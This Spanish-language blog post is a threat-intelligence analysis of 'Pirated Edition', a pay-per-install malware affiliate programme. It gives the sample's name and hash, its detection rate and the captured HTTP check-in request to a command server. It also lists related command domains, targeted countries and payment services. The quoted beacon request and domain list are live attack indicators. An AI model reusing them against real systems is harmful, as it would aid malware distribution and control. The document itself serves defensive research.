MalwareIntelligence es un sitio dedicado a la investigación sobre todas las cuestiones relacionadas con criminología informática, seguridad de la información en general y seguridad antimalware en particular, siempre desde una perspectiva estrechamente relacionado con el campo de inteligencia.

16.8.10

Pirated Edition. Programa de afiliados Pay-per-Install

Los programas de afiliados constituyen un modelo de negocio cada vez más redituable para los delincuentes, además de crear un completo circuito de propagación/infección de malware entre muchas otras alternativas, incentivando a sus clientes con un porcentaje de dinero que obtienen en función del éxito en su propio negocio.

Uno de los sistemas con mayor captación en este modelo de negocio lo constituye el pago por instalación, Pay-per-Install, donde cada cliente obtiene el dinero por la instalación de un malware. Es decir, solamente por propagar malware y esperar que alguien se infecte.

Bajo este circuito, cada afiliado puede ser tanto una sola persona como una botnet, ya que evidentemente el rédito económico que generan los delincuentes diseminando el malware proporcionado por el sistema de afiliados se masifica, y el botmaster se beneficia con una diferencia económica más amplia dentro de un lapso de tiempo más corto, además de las otras vetas económicamente fraudulentas que se generan a través de botnets.

Otro de estos programas de afiliados es Pirated Edition, cuya panel de acceso podemos observar en la siguiente imagen.


Mirando dentro del sistema de afiliados, nos encontramos con un modelo extremadamente minimalista que sólo le permite al delincuente-cliente chequear la cantidad de dinero ganado y descargar el malware a propagar, incluyendo las actualizaciones de este.


Este código malicioso, cuyo nombre por defecto es limew.exe (757eda0929b94ea104a1a80825dee3e2) posee una tasa de detección muy baja. Según el reporte de VT, sólo es detectado por 8 de los 41 motores AV.

Cuando se ejecuta, se reporta al verdadero programa de afiliados que se esconde detrás de este circuito delictivo que, en este caso, responde a husseta.com.


/get2.php?c=ROBFNNDI&d=26606B67393C34322E64636F317E3E3D2121222B25263078747D456E757923271416411A111410015D404E1618156A1971090A03700302010C090B7D7D0C07790305727474047E060C7072786A2F27212634206E6563677130303E666C6E3866505404004204020A55584C041F1B0B1D4D442D42522A021413444A4B4C494E4CB3B5B7B0A2F5F4E8EBB4CFF3FCE1E1FDF5E3BCD6CCD0B0FBFCA8C5FEA1ACB8FCCCCFD6FCC1989681DF9F9E969C8BC892808394D7D1D9D7CE85898A8B8C8D8E8FF1E7A1ADA0A9FBAAA9A5BDAABEA8E3BDB5A2B7B2B7BDF8BBB7BABBB7B8B2B3BE898FC48A80849282D5D8D8D3DDDAD6DDC8C7C6D5B1BAA4 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 011607da0826.husseta.com
Cache-Control: no-cache


Sin embargo, esta es sólo una de las caras que presenta la estrategia ya que en la misma IP (95.211.98.246) se resuelven otros dominios que cada uno de ellos lleva el mismo template.


010407da082d.deanard.com
082707d91010.bauhath.com
100407da083b.leyeshv.com
110407da0837.giselin.com
110507da031e.bauhath.com
111607da0732.giselin.com
131907da0726.deanard.com
142007da0712.weirden.com
142107da071c.giselin.com
151707da052e.antiona.com
160607d9110b.bauhath.com
161607da0722.leyeshv.com
162507da0612.mccorbet.com
171907da062d.bourgum.com
172307da072e.koralda.com
180507da0308.bauhath.com
181607da031b.derchy.com
182707da0130.bauhath.com
192507da071b.dativism.com
210907da020b.bauhath.com
222707d9101f.bourgum.com
222807d9092a.apomenbe.com

Vale aclarar un detalle particular de las políticas de este programa de afiliados. Para obtener el pago por cada instalación del malware, este debe infectar equipos que se encuentren en los siguientes países: Australia, Belgium, Brazil, Canada, Czech Republic, Denmark, Estonia, France, Germany, Greece, Finland, Hungary, Italy, Ireland, Kuwait, Lithuania, Mexico, Netherlands, New Zealand, Norway, Poland, Portugal, Romania, Russia, Saudi Arabia, Singapore, Slovakia, Spain, Sweden, Switzerland, Turkey, Ukraine, United Arab Emirates, United Kingdom, United States and Japan. Y como sistema de pago se utilizan los servicios de Epassporte, AlertPay, PayPal y Webmoney.

Información relacionada
Pay-per-Install a través de VIVA INSTALLS / HAPPY INSTALLS en BKCNET “SIA” IZZI

0 comentarios: